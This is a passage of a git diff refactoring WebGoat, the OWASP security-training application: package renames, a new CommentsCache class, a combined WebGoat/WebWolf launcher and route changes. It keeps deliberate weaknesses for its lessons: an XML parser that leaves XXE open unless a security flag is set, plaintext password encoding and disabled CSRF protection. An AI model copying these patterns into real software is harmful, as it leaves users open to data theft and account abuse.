 import java.util.ArrayList;
-import java.util.Collection;
 import java.util.Comparator;
 import java.util.HashMap;
-import java.util.List;
 import java.util.Map;
 import java.util.Optional;
-import java.util.stream.Collectors;
 
 import static java.util.Optional.empty;
 import static java.util.Optional.of;
 
-/**
- * @author nbaars
- * @since 5/3/17.
- */
 @Component
 @Scope("singleton")
-public class Comments {
+public class CommentsCache {
 
-    @Autowired
-    protected WebSession webSession;
+    static class Comments extends ArrayList<Comment> {
+        void sort() {
+            sort(Comparator.comparing(Comment::getDateTime).reversed());
+        }
+    }
 
-    protected static DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
+    private static final Comments comments = new Comments();
+    private static final Map<WebGoatUser, Comments> userComments = new HashMap<>();
+    private static final DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
 
-    private static final Map<String, List<Comment>> userComments = new HashMap<>();
-    private static final List<Comment> comments = new ArrayList<>();
+    private final WebSession webSession;
 
-    static {
+    public CommentsCache(WebSession webSession) {
+        this.webSession = webSession;
+        initDefaultComments();
+    }
+
+    void initDefaultComments() {
         comments.add(new Comment("webgoat", DateTime.now().toString(fmt), "Silly cat...."));
         comments.add(new Comment("guest", DateTime.now().toString(fmt), "I think I will use this picture in one of my projects."));
         comments.add(new Comment("guest", DateTime.now().toString(fmt), "Lol!! :-)."));
     }
 
-    protected Collection<Comment> getComments() {
-        Collection<Comment> allComments = Lists.newArrayList();
-        Collection<Comment> xmlComments = userComments.get(webSession.getUserName());
-        if (xmlComments != null) {
-            allComments.addAll(xmlComments);
+    protected Comments getComments() {
+        Comments allComments = new Comments();
+        Comments commentsByUser = userComments.get(webSession.getUser());
+        if (commentsByUser != null) {
+            allComments.addAll(commentsByUser);
         }
         allComments.addAll(comments);
-        return allComments.stream().sorted(Comparator.comparing(Comment::getDateTime).reversed()).collect(Collectors.toList());
+        allComments.sort();
+        return allComments;
     }
 
     /**
@@ -92,12 +94,12 @@ public class Comments {
     protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
         var jc = JAXBContext.newInstance(Comment.class);
         var xif = XMLInputFactory.newInstance();
-        
+
         if (webSession.isSecurityEnabled()) {
-        	xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-        	xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");  // compliant
+            xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
+            xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");  // compliant
         }
-        
+
         var xsr = xif.createXMLStreamReader(new StringReader(xml));
 
         var unmarshaller = jc.createUnmarshaller();
@@ -119,9 +121,15 @@ public class Comments {
         if (visibleForAllUsers) {
             comments.add(comment);
         } else {
-            List<Comment> comments = userComments.getOrDefault(webSession.getUserName(), new ArrayList<>());
+            var comments = userComments.getOrDefault(webSession.getUserName(), new Comments());
             comments.add(comment);
-            userComments.put(webSession.getUserName(), comments);
+            userComments.put(webSession.getUser(), comments);
         }
     }
+
+    public void reset(WebGoatUser user) {
+        comments.clear();
+        userComments.remove(user);
+        initDefaultComments();
+    }
 }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/CommentsEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
similarity index 95%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/CommentsEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
index 73de2ed78..e5a43d0e2 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/CommentsEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
@@ -40,7 +40,7 @@ import java.util.Collection;
 public class CommentsEndpoint {
 
     @Autowired
-    private Comments comments;
+    private CommentsCache comments;
 
     @GetMapping(produces = MediaType.APPLICATION_JSON_VALUE)
     @ResponseBody
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
similarity index 92%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
index 052dbe772..085d097ee 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import org.apache.commons.exec.OS;
 import org.apache.commons.lang3.exception.ExceptionUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
@@ -53,7 +53,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
     @Autowired
     private WebSession webSession;
     @Autowired
-    private Comments comments;
+    private CommentsCache comments;
 
     @PostMapping(path = "xxe/content-type")
     @ResponseBody
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Ping.java b/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
similarity index 96%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Ping.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
index 0f9ddfa53..12a270dc5 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Ping.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.RequestHeader;
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
similarity index 90%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
index f77eb5d07..37893cd73 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import org.apache.commons.exec.OS;
 import org.apache.commons.lang3.exception.ExceptionUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
@@ -61,7 +61,7 @@ public class SimpleXXE extends AssignmentEndpoint {
 
 
     @Autowired
-    private Comments comments;
+    private CommentsCache comments;
 
     @PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
     @ResponseBody
@@ -88,12 +88,6 @@ public class SimpleXXE extends AssignmentEndpoint {
         return success;
     }
 
-    @RequestMapping(path = "/xxe/tmpdir", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
-    @ResponseBody
-    public String getWebGoatHomeDirectory() {
-        return webGoatHomeDirectory;
-    }
-
     @RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
     @ResponseBody
     public String getSampleDTDFile() {
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java b/src/main/java/org/owasp/webgoat/lessons/xxe/User.java
similarity index 97%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/User.java
index 32e55b050..d32a2ef37 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/User.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import javax.xml.bind.annotation.XmlRootElement;
 
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/XXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
similarity index 90%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/XXE.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
index d1cfe17af..8a9ab9679 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/XXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/src/main/java/org/owasp/webgoat/server/ParentConfig.java b/src/main/java/org/owasp/webgoat/server/ParentConfig.java
new file mode 100644
index 000000000..be8199693
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/server/ParentConfig.java
@@ -0,0 +1,10 @@
+package org.owasp.webgoat.server;
+
+import org.springframework.context.annotation.ComponentScan;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+@ComponentScan("org.owasp.webgoat.server")
+public class ParentConfig {
+
+}
diff --git a/src/main/java/org/owasp/webgoat/server/StartWebGoat.java b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
new file mode 100644
index 000000000..ed6348264
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
@@ -0,0 +1,82 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ * <p>
+ * Copyright (c) 2002 - 2017 Bruce Mayhew
+ * <p>
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ * <p>
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ * <p>
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ * <p>
+ * Getting Source ==============
+ * <p>
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
+ * projects.
+ * <p>
+ */
+
+package org.owasp.webgoat.server;
+
+import lombok.extern.slf4j.Slf4j;
+import org.owasp.webgoat.container.WebGoat;
+import org.owasp.webgoat.webwolf.WebWolf;
+import org.springframework.boot.Banner;
+import org.springframework.boot.WebApplicationType;
+import org.springframework.boot.builder.SpringApplicationBuilder;
+import org.springframework.util.SocketUtils;
+
+import java.lang.reflect.Method;
+
+import static java.util.Optional.of;
+import static java.util.Optional.ofNullable;
+
+@Slf4j
+public class StartWebGoat {
+
+    public static final String WEBGOAT_PORT = "webgoat.port";
+    public static final String WEBWOLF_PORT = "webwolf.port";
+
+    private static final int MAX_PORT = 9999;
+
+    public static void main(String[] args) {
+        setEnvironmentVariableForPort(WEBGOAT_PORT, "8080");
+        setEnvironmentVariableForPort(WEBWOLF_PORT, "9090");
+
+        new SpringApplicationBuilder().parent(ParentConfig.class)
+                .web(WebApplicationType.NONE).bannerMode(Banner.Mode.OFF)
+                .child(WebGoat.class)
+                .web(WebApplicationType.SERVLET)
+                .sibling(WebWolf.class).bannerMode(Banner.Mode.OFF)
+                .web(WebApplicationType.SERVLET)
+                .run(args);
+    }
+
+    private static void setEnvironmentVariableForPort(String name, String defaultValue) {
+        ofNullable(System.getProperty(name))
+                .or(() -> of(defaultValue))
+                .map(Integer::parseInt)
+                .map(port -> findPort(port))
+                .ifPresent(port -> System.setProperty(name, port));
+    }
+
+    public static String findPort(int port) {
+        try {
+            if (port == MAX_PORT) {
+                log.error("No free port found from 8080 - {}", MAX_PORT);
+                return "" + port;
+            }
+            return "" + SocketUtils.findAvailableTcpPort(port, port);
+        } catch (IllegalStateException var4) {
+            return findPort(port + 1);
+        }
+    }
+
+}
diff --git a/src/main/java/org/owasp/webgoat/server/StartupMessage.java b/src/main/java/org/owasp/webgoat/server/StartupMessage.java
new file mode 100644
index 000000000..9395d3bb4
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/server/StartupMessage.java
@@ -0,0 +1,33 @@
+package org.owasp.webgoat.server;
+
+import lombok.NoArgsConstructor;
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.boot.context.event.ApplicationReadyEvent;
+import org.springframework.context.event.ContextStoppedEvent;
+import org.springframework.context.event.EventListener;
+import org.springframework.stereotype.Component;
+import org.springframework.util.StringUtils;
+
+@Component
+@Slf4j
+@NoArgsConstructor
+public class StartupMessage {
+
+    private String port;
+    private String address;
+
+    @EventListener
+    void onStartup(ApplicationReadyEvent event) {
+        if (StringUtils.hasText(port) && !StringUtils.hasText(System.getProperty("running.in.docker"))) {
+            log.info("Please browse to http://{}:{}/WebGoat to get started...", address, port);
+        }
+        if (event.getApplicationContext().getApplicationName().contains("WebGoat")) {
+            port = event.getApplicationContext().getEnvironment().getProperty("server.port");
+            address = event.getApplicationContext().getEnvironment().getProperty("server.address");
+        }
+    }
+
+    @EventListener
+    void onShutdown(ContextStoppedEvent event) {
+    }
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/FileServer.java b/src/main/java/org/owasp/webgoat/webwolf/FileServer.java
similarity index 82%
rename from webwolf/src/main/java/org/owasp/webwolf/FileServer.java
rename to src/main/java/org/owasp/webgoat/webwolf/FileServer.java
index e811af2c4..4cb608545 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/FileServer.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/FileServer.java
@@ -20,19 +20,23 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf;
+package org.owasp.webgoat.webwolf;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.io.FileUtils;
-import org.owasp.webwolf.user.WebGoatUser;
+import org.owasp.webgoat.webwolf.user.WebGoatUser;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
 import org.springframework.security.core.context.SecurityContextHolder;
 import org.springframework.stereotype.Controller;
 import org.springframework.ui.ModelMap;
-import org.springframework.web.bind.annotation.*;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.multipart.MultipartFile;
 import org.springframework.web.servlet.ModelAndView;
 import org.springframework.web.servlet.view.RedirectView;
@@ -40,7 +44,6 @@ import org.springframework.web.servlet.view.RedirectView;
 import javax.servlet.http.HttpServletRequest;
 import java.io.File;
 import java.io.IOException;
-import java.nio.file.Files;
 import java.util.ArrayList;
 
 import static org.springframework.http.MediaType.ALL_VALUE;
@@ -59,26 +62,23 @@ public class FileServer {
     @Value("${server.port}")
     private int port;
 
-    @RequestMapping(path = "/tmpdir", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
+    @RequestMapping(path = "/file-server-location", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
     @ResponseBody
     public String getFileLocation() {
         return fileLocation;
     }
 
-    @PostMapping(value = "/WebWolf/fileupload")
+    @PostMapping(value = "/fileupload")
     public ModelAndView importFile(@RequestParam("file") MultipartFile myFile) throws IOException {
-        WebGoatUser user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        File destinationDir = new File(fileLocation, user.getUsername());
+        var user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+        var destinationDir = new File(fileLocation, user.getUsername());
         destinationDir.mkdirs();
         myFile.transferTo(new File(destinationDir, myFile.getOriginalFilename()));
         log.debug("File saved to {}", new File(destinationDir, myFile.getOriginalFilename()));
-        Files.createFile(new File(destinationDir, user.getUsername() + "_changed").toPath());
 
-        ModelMap model = new ModelMap();
-        model.addAttribute("uploadSuccess", "File uploaded successful");
         return new ModelAndView(
                 new RedirectView("files", true),
-                model
+                new ModelMap().addAttribute("uploadSuccess", "File uploaded successful")
         );
     }
 
@@ -90,7 +90,7 @@ public class FileServer {
         private final String link;
     }
 
-    @GetMapping(value = "/WebWolf/files")
+    @GetMapping(value = "/files")
     public ModelAndView getFiles(HttpServletRequest request) {
         WebGoatUser user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
         String username = user.getUsername();
diff --git a/webwolf/src/main/java/org/owasp/webwolf/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
similarity index 76%
rename from webwolf/src/main/java/org/owasp/webwolf/MvcConfiguration.java
rename to src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
index 7c491a95f..836c1413f 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
@@ -20,20 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf;
+package org.owasp.webgoat.webwolf;
 
 import org.springframework.beans.factory.annotation.Value;
-import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
-import org.springframework.context.annotation.DependsOn;
-import org.springframework.context.annotation.Primary;
-import org.springframework.jdbc.datasource.DriverManagerDataSource;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
 
 import javax.annotation.PostConstruct;
-import javax.sql.DataSource;
 import java.io.File;
 
 /**
@@ -44,24 +39,28 @@ import java.io.File;
 public class MvcConfiguration implements WebMvcConfigurer {
 
     @Value("${webwolf.fileserver.location}")
-    private String fileLocatation;
+    private String fileLocation;
 
     @Override
     public void addResourceHandlers(ResourceHandlerRegistry registry) {
-        registry.addResourceHandler("/files/**").addResourceLocations("file:///" + fileLocatation + "/");
+        registry.addResourceHandler("/files/**").addResourceLocations("file:///" + fileLocation + "/");
+
+        registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webwolf/static/css/");
+        registry.addResourceHandler("/js/**").addResourceLocations("classpath:/webwolf/static/js/");
+        registry.addResourceHandler("/images/**").addResourceLocations("classpath:/webwolf/static/images/");
     }
 
     @Override
     public void addViewControllers(ViewControllerRegistry registry) {
-        registry.addViewController("/login").setViewName("login");
-        registry.addViewController("/WebWolf/home").setViewName("home");
+        registry.addViewController("/login").setViewName("webwolf-login");
+        registry.addViewController("/home").setViewName("home");
     }
 
     @PostConstruct
     public void createDirectory() {
-        File file = new File(fileLocatation);
+        File file = new File(fileLocation);
         if (!file.exists()) {
             file.mkdirs();
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/WebSecurityConfig.java b/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
similarity index 90%
rename from webwolf/src/main/java/org/owasp/webwolf/WebSecurityConfig.java
rename to src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
index 334b0af4c..f867ea0bd 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/WebSecurityConfig.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
@@ -20,13 +20,14 @@
  *
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
-package org.owasp.webwolf;
+package org.owasp.webgoat.webwolf;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webwolf.user.UserService;
+import org.owasp.webgoat.webwolf.user.UserService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.http.HttpMethod;
 import org.springframework.security.authentication.AuthenticationManager;
 import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
@@ -50,15 +51,16 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     protected void configure(HttpSecurity http) throws Exception {
         ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security = http
                 .authorizeRequests()
-                .antMatchers("/css/**", "/images/**", "/js/**", "/fonts/**", "/webjars/**").permitAll()
-                .antMatchers("/WebWolf/**").authenticated()
+                .antMatchers("/css/**", "/images/**", "/js/**", "/fonts/**", "/webjars/**", "/home").permitAll()
+                .antMatchers(HttpMethod.GET, "/mail/**", "/requests/**").authenticated()
+                .antMatchers("/files").authenticated()
                 .anyRequest().permitAll();
         security.and().csrf().disable().formLogin()
                 .loginPage("/login").failureUrl("/login?error=true");
         security.and()
                 .formLogin()
                 .loginPage("/login")
-                .defaultSuccessUrl("/WebWolf/home", true)
+                .defaultSuccessUrl("/home", true)
                 .permitAll();
         security.and()
                 .logout()
@@ -86,4 +88,4 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     public NoOpPasswordEncoder passwordEncoder() {
         return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
     }
-}
\ No newline at end of file
+}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/UserForm.java b/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
similarity index 58%
rename from webwolf/src/main/java/org/owasp/webwolf/user/UserForm.java
rename to src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
index 42d9bc95d..25429a664 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/user/UserForm.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
@@ -20,31 +20,25 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.user;
+package org.owasp.webgoat.webwolf;
 
-import lombok.Getter;
-import lombok.Setter;
+import org.owasp.webgoat.webwolf.requests.WebWolfTraceRepository;
+import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
+import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.ComponentScan;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.PropertySource;
 
-import javax.validation.constraints.NotNull;
-import javax.validation.constraints.Size;
+@Configuration
+@ComponentScan("org.owasp.webgoat.webwolf")
+@PropertySource("classpath:application-webwolf.properties")
+@EnableAutoConfiguration
+public class WebWolf {
 
-/**
- * @author nbaars
- * @since 3/19/17.
- */
-@Getter
-@Setter
-public class UserForm {
+    @Bean
+    public HttpTraceRepository traceRepository() {
+        return new WebWolfTraceRepository();
+    }
 
-    @NotNull
-    @Size(min=6, max=40)
-    private String username;
-    @NotNull
-    @Size(min=6, max=10)
-    private String password;
-    @NotNull
-    @Size(min=6, max=10)
-    private String matchingPassword;
-    @NotNull
-    private String agree;
 }
diff --git a/webwolf/src/main/java/org/owasp/webwolf/jwt/JWTController.java b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
similarity index 78%
rename from webwolf/src/main/java/org/owasp/webwolf/jwt/JWTController.java
rename to src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
index 17c8bc172..bc5c5f5c4 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/jwt/JWTController.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
@@ -1,4 +1,4 @@
-package org.owasp.webwolf.jwt;
+package org.owasp.webgoat.webwolf.jwt;
 
 import org.springframework.util.MultiValueMap;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -13,19 +13,19 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 @RestController
 public class JWTController {
 
-    @GetMapping("/WebWolf/jwt")
+    @GetMapping("/jwt")
     public ModelAndView jwt() {
         return new ModelAndView("jwt");
     }
 
-    @PostMapping(value = "/WebWolf/jwt/decode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
+    @PostMapping(value = "/jwt/decode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
     public JWTToken decode(@RequestBody MultiValueMap<String, String> formData) {
         var jwt = formData.getFirst("token");
         var secretKey = formData.getFirst("secretKey");
         return JWTToken.decode(jwt, secretKey);
     }
 
-    @PostMapping(value = "/WebWolf/jwt/encode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
+    @PostMapping(value = "/jwt/encode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
     public JWTToken encode(@RequestBody MultiValueMap<String, String> formData) {
         var header = formData.getFirst("header");
         var payload = formData.getFirst("payload");
diff --git a/webwolf/src/main/java/org/owasp/webwolf/jwt/JWTToken.java b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
similarity index 95%
rename from webwolf/src/main/java/org/owasp/webwolf/jwt/JWTToken.java
rename to src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
index 3126880c5..ced8fcbf6 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/jwt/JWTToken.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
@@ -1,4 +1,4 @@
-package org.owasp.webwolf.jwt;
+package org.owasp.webgoat.webwolf.jwt;
 
 import com.fasterxml.jackson.core.JsonProcessingException;
 import com.fasterxml.jackson.databind.ObjectMapper;
@@ -11,12 +11,12 @@ import org.jose4j.jws.JsonWebSignature;
 import org.jose4j.jwt.consumer.InvalidJwtException;
 import org.jose4j.jwt.consumer.JwtConsumer;
 import org.jose4j.jwt.consumer.JwtConsumerBuilder;
+import org.jose4j.jwx.CompactSerializer;
 import org.jose4j.keys.HmacKey;
 import org.jose4j.lang.JoseException;
 
 import java.util.Map;
 import java.util.TreeMap;
-import java.util.regex.Pattern;
 
 import static java.nio.charset.StandardCharsets.UTF_8;
 import static org.jose4j.jwx.CompactSerializer.serialize;
@@ -80,7 +80,7 @@ public class JWTToken {
         jws.setPayload(payloadAsString);
         headers.forEach((k, v) -> jws.setHeader(k, v));
         if (!headers.isEmpty()) { //otherwise e30 meaning {} will be shown as header
-            builder.encoded(serialize(new String[]{jws.getHeaders().getEncodedHeader(), jws.getEncodedPayload()}));
+            builder.encoded(CompactSerializer.serialize(new String[]{jws.getHeaders().getEncodedHeader(), jws.getEncodedPayload()}));
         }
 
         //Only sign when valid header and payload
diff --git a/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
similarity index 98%
rename from webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
rename to src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
index 279d8412d..8b009ceae 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webwolf.mailbox;
+package org.owasp.webgoat.webwolf.mailbox;
 
 import com.fasterxml.jackson.annotation.JsonIgnore;
 import lombok.AllArgsConstructor;
diff --git a/webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxController.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
similarity index 83%
rename from webwolf/src/main/java/org/owasp/webwolf/mailbox/MailboxController.java
rename to src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
